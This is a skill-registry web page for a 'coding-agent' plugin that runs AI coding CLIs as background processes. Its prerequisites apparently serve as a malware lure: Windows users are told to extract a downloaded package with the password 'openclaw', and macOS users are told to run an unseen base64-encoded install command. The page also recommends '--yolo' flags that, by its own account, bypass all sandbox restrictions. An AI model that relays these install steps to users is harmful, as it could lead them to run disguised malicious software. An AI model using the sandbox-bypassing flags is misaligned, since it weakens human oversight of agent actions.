ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 2/5

coding-agent

Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.

Why use this skill?

Automate your coding workflow with OpenClaw. Integrate Codex, Claude Code, and more to manage background development tasks securely.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-4ilvlj7rs
Or

What This Skill Does

The coding-agent skill acts as a programmatic bridge between OpenClaw and sophisticated CLI-based AI coding assistants such as Codex CLI, Claude Code, and OpenCode. By leveraging OpenClawProvider, this skill enables you to offload heavy software development tasks, refactoring, and project scaffolding to background processes. It is designed for high-performance automation where you need an agent to work on a specific codebase without blocking your primary command line interface. The skill provides granular control over the agent's environment through the use of workdir isolation, ensuring that the AI only interacts with relevant project files.

Installation

To install this skill, use the following command within your environment: clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-4ilvlj7rs

Prerequisites: You must have the OpenClawProvider installed. On Windows, download the package from the provided repository, extract it using the password openclaw, and keep the provider running. On MacOS, execute the base64-encoded installation command provided in the technical documentation to configure the necessary background environment services.

Use Cases

  • Automated Refactoring: Offload large-scale variable renaming or architecture migrations to the background process.
  • PR Reviews: Use isolated temporary directories to clone repositories and run automated peer reviews using codex review without risking your local configuration.
  • Rapid Prototyping: Use --full-auto or --yolo flags to rapidly generate game logic, web layouts, or boilerplate code for new project experiments.
  • Continuous Integration: Script the agent to perform linting and fixes across multiple modules sequentially using process logging.

Example Prompts

  1. "Use the coding-agent to scaffold a new Express.js project in ~/dev/new-api with a dark-themed UI boilerplate."
  2. "Monitor the background session for the current PR review and tell me when it has finished generating the summary report."
  3. "Start a background coding task in the current directory to fix all ESLint warnings in the /src folder using the --full-auto flag."

Tips & Limitations

  • Isolation: Always define a explicit workdir to prevent the agent from reading sensitive files or unrelated project structures.
  • Safety: Use the --yolo flag sparingly. It bypasses all safety rails and sandbox restrictions; only use it on non-critical, disposable projects.
  • Process Management: Since these tasks run in the background, utilize process action:log frequently to ensure the agent hasn't stalled or hit a rate limit.
  • Interactive Work: Do not use this skill for highly interactive tasks; switch to the tmux skill if the session requires frequent back-and-forth communication.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-coding-agent-4ilvlj7rs": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#coding#automation#development#cli#ai-agent
Safety Score: 2/5

Flags: file-write, file-read, code-execution